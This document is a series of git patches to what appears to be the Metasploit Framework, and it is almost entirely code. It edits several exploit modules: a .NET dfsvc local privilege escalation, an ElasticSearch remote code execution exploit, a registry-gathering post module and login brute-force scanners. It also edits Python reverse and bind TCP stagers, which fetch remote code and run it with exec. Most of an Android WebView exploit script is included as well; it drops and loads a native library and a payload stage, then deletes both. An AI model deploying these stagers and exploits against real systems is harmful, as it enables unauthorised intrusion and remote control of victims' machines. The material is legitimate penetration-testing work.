d0241cf4c18378c70ca553bc764f62d4cb027f40 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Mon, 2 Jun 2014 08:14:40 -0500 Subject: [PATCH 447/853] Add check method --- .../windows/local/ms14_009_ie_dfsvc.rb | 58 +++++++++++++++---- 1 file changed, 46 insertions(+), 12 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 5d705751d5..c731b39ea4 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -69,6 +69,50 @@ class Metasploit3 < Msf::Exploit::Local ]) end + def check + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + return Exploit::CheckCode::Unknown + end + + net_version = get_net_version + + if net_version.empty? + return Exploit::CheckCode::Unknown + end + + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + return Exploit::CheckCode::Detected + end + + mscorlib_version = get_mscorlib_version + + unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] + return Exploit::CheckCode::Safe + end + + Exploit::CheckCode::Vulnerable + end + + def get_net_version + net_version = "" + + dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + dfsvc_version = dfsvc_version.join(".") + + NET_VERSIONS.each do |k,v| + if v["dfsvc"] == dfsvc_version + net_version = k + end + end + + net_version + end + + def get_mscorlib_version + mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + mscorlib_version.join(".") + end + def exploit print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil? @@ -87,16 +131,7 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") end - dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") - dfsvc_version = dfsvc_version.join(".") - - net_version = "" - - NET_VERSIONS.each do |k,v| - if v["dfsvc"] == dfsvc_version - net_version = k - end - end + net_version = get_net_version if net_version.empty? fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1") @@ -110,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)") end - mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") - mscorlib_version = mscorlib_version.join(".") + mscorlib_version = get_mscorlib_version unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") From 428df197396fbdb549f71af263566538ce1b1908 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Mon, 2 Jun 2014 17:28:09 +0200 Subject: [PATCH 448/853] Changed message --- lib/msf/core/exploit/file_dropper.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 8020bf7533..6a658243b0 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -122,7 +122,7 @@ module Exploit::FileDropper end @dropped_files.each do |f| - print_warning("This exploit may require manual cleanup on the target of: #{f}") + print_warning("This exploit may require manual cleanup of '#{f}' on the target") end end From b7dc89f56924130e5087273112b9680fe2d8bba1 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 2 Jun 2014 13:09:46 -0500 Subject: [PATCH 449/853] I prefer "bruteforce" to "brute force" for search Just makes it easier to search for, since it's an industry term of art. --- modules/auxiliary/scanner/http/etherpad_duo_login.rb | 6 +++--- modules/auxiliary/scanner/http/pocketpad_login.rb | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index f17d451bee..66371cc7d1 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -13,10 +13,10 @@ class Metasploit3 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Name' => 'EtherPAD Duo Login Bruteforce Utility', 'Description' => %{ This module scans for EtherPAD Duo login portal, and - performs a login brute force attack to identify valid credentials. + performs a login bruteforce attack to identify valid credentials. }, 'Author' => [ @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("#{peer} - Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 1a7dc9da52..a1a5b75f56 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => 'PocketPAD Login Brute Force Utility', + 'Name' => 'PocketPAD Login Bruteforce Force Utility', 'Description' => %{ This module scans for PocketPAD login portal, and - performs a login brute force attack to identify valid credentials. + performs a login bruteforce attack to identify valid credentials. }, 'Author' => [ @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("#{peer} - Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end From ea383b41393b22b84099e3edb05056eda34575e7 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 2 Jun 2014 13:20:01 -0500 Subject: [PATCH 450/853] Make print/descs/case consistent --- .../multi/elasticsearch/script_mvel_rce.rb | 21 ++++++------- modules/post/windows/gather/enum_muicache.rb | 30 +++++++++---------- 2 files changed, 26 insertions(+), 25 deletions(-) diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 4cea8269d3..5012a8239d 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -15,10 +15,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', 'Description' => %q{ - This module exploits a remote command execution vulnerability in ElasticSearch, + This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.2.0. The bug is found in the - REST API, which requires no authentication or authorization, where the search - function allows dynamic scripts execution, and can be used for remote attackers + REST API, which does not require authentication, where the search + function allows dynamic scripts execution. It can be used for remote attackers to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. }, @@ -65,29 +65,30 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to execute arbitrary Java..") + print_status("#{peer} - Trying to execute arbitrary Java...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end - print_status("#{peer} - Asking remote OS...") + print_status("#{peer} - Discovering remote OS...") res = execute(java_os) result = parse_result(res) if result.nil? - fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") + fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else - print_good("#{peer} - OS #{result} found") + # TODO: It'd be nice to report_host() with this info. + print_good("#{peer} - Remote OS is '#{result}' ") end jar_file = "" if result =~ /win/i - print_status("#{peer} - Asking TEMP path") + print_status("#{peer} - Discovering TEMP path") res = execute(java_tmp_dir) result = parse_result(res) if result.nil? - fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") + fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path found on #{result}") + print_good("#{peer} - TEMP path identified: '#{result}' ") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else diff --git a/modules/post/windows/gather/enum_muicache.rb b/modules/post/windows/gather/enum_muicache.rb index dbf8824fd9..6b25a3dab2 100644 --- a/modules/post/windows/gather/enum_muicache.rb +++ b/modules/post/windows/gather/enum_muicache.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module gathers information about the files and file paths that logged on users have - executed on the system. It also will check if the file exists on the system still. This + executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post username_reg_path = "HKLM\\Software\\Microsoft\\Windows\ NT\\CurrentVersion\\ProfileList" profile_subkeys = registry_enumkeys(username_reg_path) if profile_subkeys.blank? - print_error("Unable to access ProfileList registry key. Can't continue.") + print_error("Unable to access ProfileList registry key. Unable to continue.") return nil end @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post end user_home_path = registry_getvaldata("#{username_reg_path}\\#{user_sid}", "ProfileImagePath") if user_home_path.blank? - print_error("Unable to read ProfileImagePath from the registry. Can't continue.") + print_error("Unable to read ProfileImagePath from the registry. Unable to continue.") return nil end full_path = user_home_path.strip @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Post # If the registry_enumvals returns us nothing then we'll know # that the user is most likely not logged in and we'll need to # download and process users hive locally. - print_warning("User #{user}: Can't access registry (maybe the user is not logged in atm?). Trying NTUSER.DAT/USRCLASS.DAT..") + print_warning("User #{user}: Can't access registry. Maybe the user is not logged in? Trying NTUSER.DAT/USRCLASS.DAT...") result = process_hive(sys_path, user, muicache, hive_file) unless result.nil? result.each { |r| @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post # If the registry_enumvals returns us content we'll know that we # can access the registry directly and thus continue to process # the content collected from there. - print_status("User #{user}: Enumerating registry..") + print_status("User #{user}: Enumerating registry...") subkeys.each do |key| if key[0] != "@" && key != "LangID" && !key.nil? result = check_file_exists(key, user) @@ -142,11 +142,11 @@ class Metasploit3 < Msf::Post ntuser_status = file_exist?(hive_path) unless ntuser_status == true - print_warning("Couldn't locate/download #{user}'s registry hive. Can't proceed.") + print_warning("Couldn't locate/download #{user}'s registry hive. Unable to proceed.") return nil end - print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file..") + print_status("Downloading #{user}'s NTUSER.DAT/USRCLASS.DAT file...") local_hive_copy = Rex::Quickfile.new("jtrtmp") local_hive_copy.close begin @@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post # extracting the contents of the MUICache registry key. def hive_parser(local_hive_copy, muicache, user) results = [] - print_status("Parsing registry content..") - err_msg = "Error parsing hive. Can't continue." + print_status("Parsing registry content...") + err_msg = "Error parsing hive. Unable to continue." hive = Rex::Registry::Hive.new(local_hive_copy) if hive.nil? print_error(err_msg) @@ -210,7 +210,7 @@ class Metasploit3 < Msf::Post # - http://forensicartifacts.com/2010/08/registry-muicache/ # - http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots def run - print_status("Starting to enumerate MuiCache registry keys..") + print_status("Starting to enumerate MUICache registry keys...") sys_info = sysinfo['OS'] if sys_info =~/Windows XP/ && is_admin? @@ -219,7 +219,7 @@ class Metasploit3 < Msf::Post hive_file = "\\NTUSER.DAT" elsif sys_info =~/Windows 7/ && is_admin? print_good("Remote system supported: #{sys_info}") - muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache" + muicache = "_Classes\\Local\ Settings\\Software\\Microsoft\\Windows\\Shell\\MUICache" hive_file = "\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat" else print_error("Unsupported OS or not enough privileges. Unable to continue.") @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Post "File status", ]) - print_status("Phase 1: Searching user names..") + print_status("Phase 1: Searching user names...") sys_users, sys_paths, sys_sids = find_user_names if sys_users.blank? @@ -246,16 +246,16 @@ class Metasploit3 < Msf::Post print_good("Users found: #{sys_users.join(", ")}") end - print_status("Phase 2: Searching registry hives..") + print_status("Phase 2: Searching registry hives...") muicache_reg_keys = enum_muicache_paths(sys_sids, muicache) results = enumerate_muicache(muicache_reg_keys, sys_users, sys_paths, muicache, hive_file) results.each { |r| table << r } - print_status("Phase 3: Processing results..") + print_status("Phase 3: Processing results...") loot = store_loot("muicache_info", "text/plain", session, table.to_s, nil, "MUICache Information") print_line("\n" + table.to_s + "\n") - print_status("Results stored in: #{loot}") + print_status("Results stored as: #{loot}") print_status("Execution finished.") end From b136765ef7bfd48b160c01ad80b5f5a4c74e98ca Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 2 Jun 2014 14:22:01 -0500 Subject: [PATCH 451/853] Nuke extra space at EOL --- modules/exploits/multi/elasticsearch/script_mvel_rce.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 5012a8239d..c338fe7ffa 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else # TODO: It'd be nice to report_host() with this info. - print_good("#{peer} - Remote OS is '#{result}' ") + print_good("#{peer} - Remote OS is '#{result}'") end jar_file = "" @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote if result.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else - print_good("#{peer} - TEMP path identified: '#{result}' ") + print_good("#{peer} - TEMP path identified: '#{result}'") end jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" else From 3c38c0d87ceba4d97ce93df31c0cfaf952e69473 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Mon, 2 Jun 2014 14:37:29 -0500 Subject: [PATCH 452/853] Dont be confident about string comparision --- .../windows/local/ms14_009_ie_dfsvc.rb | 28 +++++++++++++++++-- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index c731b39ea4..525bd101db 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -86,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Local mscorlib_version = get_mscorlib_version - unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] - return Exploit::CheckCode::Safe + if valid_mscorlib_version?(net_version, mscorlib_version) + return Exploit::CheckCode::Vulnerable end - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Safe end def get_net_version @@ -161,6 +161,28 @@ class Metasploit3 < Msf::Exploit::Local session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil) end + def valid_mscorlib_version?(net_version, mscorlib_version) + valid = false + + mscorlib = mscorlib_version.split(".") + mscorlib.reverse! + + max_version = NET_VERSIONS[net_version]["mscorlib"].split(".") + max_version.reverse! + + i = 0 + mscorlib.each do |v| + if v.to_i < max_version[i].to_i + valid = true + elsif v.to_i > max_version[i].to_i + valid = false + end + i = i + 1 + end + + valid + end + def primer exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri) From 9574a327f8f6e623620f8a6697c4525c391c3dc0 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Mon, 2 Jun 2014 14:38:33 -0500 Subject: [PATCH 453/853] use the new check also in exploit() --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 525bd101db..55d028cd29 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Local mscorlib_version = get_mscorlib_version - unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] + unless valid_mscorlib_version?(net_version, mscorlib_version) fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") end From ff6607bd87e5f0720e6fbf43df57c473c13d18d6 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Mon, 2 Jun 2014 22:37:20 +0200 Subject: [PATCH 454/853] Correct documentation link changed link from https://dev.metasploit.com/documents/api/ to https://dev.metasploit.com/api/ --- CONTRIBUTING.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index b0614159d5..fccd9c49a7 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -50,7 +50,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940) #### New Modules * **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb). -* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much. +* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much. * **Don't** include more than one module per pull request. #### Library Code From b84297980d57cac99b305302324fa426cdb53129 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Mon, 2 Jun 2014 16:50:54 -0400 Subject: [PATCH 455/853] Pymeterpreter use print_exc and not print_exception --- data/meterpreter/meterpreter.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 24a635bbfc..7ed0222f35 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -526,8 +526,7 @@ class PythonMeterpreter(object): except Exception: if DEBUGGING: print('[-] method ' + handler_name + ' resulted in an error') - exc_type, exc_value, exc_traceback = sys.exc_info() - traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stderr) + traceback.print_exc(file=sys.stderr) result = ERROR_FAILURE else: if DEBUGGING: From aeca455a10fa7a74a3108451209e9d03f124f0db Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Mon, 2 Jun 2014 17:18:13 -0400 Subject: [PATCH 456/853] Pymeterpreter update pystagers for version 3.1/3.2 --- modules/payloads/stagers/python/bind_tcp.rb | 28 ++++++++++--------- .../payloads/stagers/python/reverse_tcp.rb | 24 ++++++++-------- 2 files changed, 28 insertions(+), 24 deletions(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 356a3fcfbf..62dda5d3bb 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -29,22 +29,24 @@ module Metasploit3 # Constructs the payload # def generate - cmd = '' # Set up the socket - cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 - cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" - cmd += "s.listen(1)\n" - cmd += "c,a=s.accept()\n" - cmd += "l=struct.unpack('>I',c.recv(4))[0]\n" - cmd += "d=c.recv(4096)\n" - cmd += "while len(d)!=l:\n" - cmd += "\td+=c.recv(4096)\n" - cmd += "exec(d,{'s':c})\n" + cmd = "import socket,struct\n" + cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 + cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd << "s.listen(1)\n" + cmd << "c,a=s.accept()\n" + cmd << "l=struct.unpack('>I',c.recv(4))[0]\n" + cmd << "d=c.recv(4096)\n" + cmd << "while len(d)!=l:\n" + cmd << "\td+=c.recv(4096)\n" + cmd << "exec(d,{'s':c})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))" - return cmd + b64_stub = "import base64,sys; exec(base64.b64decode(" + b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << Rex::Text.encode_base64(cmd) + b64_stub << "')))" + return b64_stub end def handle_intermediate_stage(conn, payload) diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 5f4e0cf92e..71086455c2 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -29,20 +29,22 @@ module Metasploit3 # Constructs the payload # def generate - cmd = '' # Set up the socket - cmd += "import socket,struct\n" - cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 - cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" - cmd += "l=struct.unpack('>I',s.recv(4))[0]\n" - cmd += "d=s.recv(4096)\n" - cmd += "while len(d)!=l:\n" - cmd += "\td+=s.recv(4096)\n" - cmd += "exec(d,{'s':s})\n" + cmd = "import socket,struct\n" + cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2 + cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd << "l=struct.unpack('>I',s.recv(4))[0]\n" + cmd << "d=s.recv(4096)\n" + cmd << "while len(d)!=l:\n" + cmd << "\td+=s.recv(4096)\n" + cmd << "exec(d,{'s':s})\n" # Base64 encoding is required in order to handle Python's formatting requirements in the while loop - cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))" - return cmd + b64_stub = "import base64,sys; exec(base64.b64decode(" + b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << Rex::Text.encode_base64(cmd) + b64_stub << "')))" + return b64_stub end def handle_intermediate_stage(conn, payload) From 76c3aaf743f04b21d06f17cfb0fb310f3a1eeabb Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Mon, 2 Jun 2014 17:32:08 -0400 Subject: [PATCH 457/853] Pymeterpreter get type encoder from dict instead --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 62dda5d3bb..6886bce4f1 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -43,7 +43,7 @@ module Metasploit3 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 71086455c2..2921f9011f 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -41,7 +41,7 @@ module Metasploit3 # Base64 encoding is required in order to handle Python's formatting requirements in the while loop b64_stub = "import base64,sys; exec(base64.b64decode(" - b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('" + b64_stub << "{2:str}.get(sys.version_info[0],lambda b:bytes(b,'UTF-8'))('" b64_stub << Rex::Text.encode_base64(cmd) b64_stub << "')))" return b64_stub From feca6c470029aaa6ca88ff774b9b792ccf1025db Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Sat, 31 May 2014 15:48:24 -0500 Subject: [PATCH 458/853] Add exploit for ajsif vuln in Adobe Reader. * This refactors the logic of webview_addjavascriptinterface into a mixin (android.rb). * Additionally, some behavior in pdf.rb had to be modified (in backwards-compatible ways). Conflicts: lib/msf/core/exploit/mixins.rb --- lib/msf/core/exploit/android.rb | 101 ++++++++++++++ lib/msf/core/exploit/mixins.rb | 6 +- lib/msf/core/exploit/pdf.rb | 92 +++++++++++-- .../browser/webview_addjavascriptinterface.rb | 96 +------------ .../adobe_reader_pdf_js_interface.rb | 127 ++++++++++++++++++ 5 files changed, 314 insertions(+), 108 deletions(-) create mode 100644 lib/msf/core/exploit/android.rb create mode 100644 modules/exploits/android/fileformat/adobe_reader_pdf_js_interface.rb diff --git a/lib/msf/core/exploit/android.rb b/lib/msf/core/exploit/android.rb new file mode 100644 index 0000000000..e0d7bd6c5f --- /dev/null +++ b/lib/msf/core/exploit/android.rb @@ -0,0 +1,101 @@ +# -*- coding: binary -*- +require 'msf/core' + +module Msf +module Exploit::Android + + # Since the NDK stager is used, arch detection must be performed + SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ] + + # Most android devices are ARM + DEFAULT_ARCH = ARCH_ARMLE + + # Some of the default NDK build targets are named differently than + # msf's builtin constants. This mapping allows the ndkstager file + # to be looked up from the msf constant. + NDK_FILES = { + ARCH_ARMLE => 'armeabi', + ARCH_MIPSLE => 'mips' + } + + def add_javascript_interface_exploit_js(arch) + stagename = Rex::Text.rand_text_alpha(5) + script = %Q| + function exec(runtime, cmdArr) { + var ch = 0; + var output = ''; + var process = runtime.exec(cmdArr); + var input = process.getInputStream(); + + while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); } + return output; + } + + function attemptExploit(obj) { + // ensure that the object contains a native interface + try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } + + // get the pid + var pid = obj.getClass() + .forName('android.os.Process') + .getMethod('myPid', null) + .invoke(null, null); + + // get the runtime so we can exec + var runtime = obj.getClass() + .forName('java.lang.Runtime') + .getMethod('getRuntime', null) + .invoke(null, null); + + // libraryData contains the bytes for a native shared object built via NDK + // which will load the "stage", which in this case is our android meterpreter stager. + // LibraryData is loaded via ajax later, because we have to access javascript in + // order to detect what arch we are running. + var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}"; + + // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains + // another stager which loads android meterpreter from the msf handler. + var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}"; + + // get the process name, which will give us our data path + // $PPID does not seem to work on android 4.0, so we concat pids manually + var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); + + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; + var stagePath = path + '/#{stagename}.apk'; + + // build the library and chmod it + runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['chmod', '700', libraryPath]).waitFor(); + + // build the stage, chmod it, and load it + runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['chmod', '700', stagePath]).waitFor(); + + // load the library (this fails in x86, figure out why) + runtime.load(libraryPath); + + // delete dropped files + runtime.exec(['rm', stagePath]).waitFor(); + runtime.exec(['rm', libraryPath]).waitFor(); + + return true; + } + + for (i in top) { if (attemptExploit(top[i]) === true) break; } + | + + # remove comments and empty lines + script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '') + end + + + # The NDK stager is used to launch a hidden APK + def ndkstager(stagename, arch) + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so') + data = File.read(localfile, :mode => 'rb') + data.gsub!('PLOAD', stagename) + end + +end +end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 995d8d9ad2..bafcf4a660 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -92,7 +92,7 @@ require 'msf/core/exploit/java' # WBEM require 'msf/core/exploit/wbemexec' -#WinRM +# WinRM require 'msf/core/exploit/winrm' # WebApp @@ -102,4 +102,8 @@ require 'msf/core/exploit/web' require 'msf/core/exploit/remote/firefox_privilege_escalation' require 'msf/core/exploit/remote/firefox_addon_generator' +# Android +require 'msf/core/exploit/android' + +# Browser Exploit Server require 'msf/core/exploit/remote/browser_exploit_server' diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index ee7afe937c..9412ad4b67 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -22,7 +22,7 @@ module Exploit::PDF ) # We're assuming we'll only create one pdf at a time here. - @xref = [] + @xref = {} @pdf = '' end @@ -148,13 +148,13 @@ module Exploit::PDF #PDF building block functions ## def header(version = '1.5') - hdr = "%PDF-1.5" << eol + hdr = "%PDF-#{version}" << eol hdr << "%" << RandomNonASCIIString(4) << 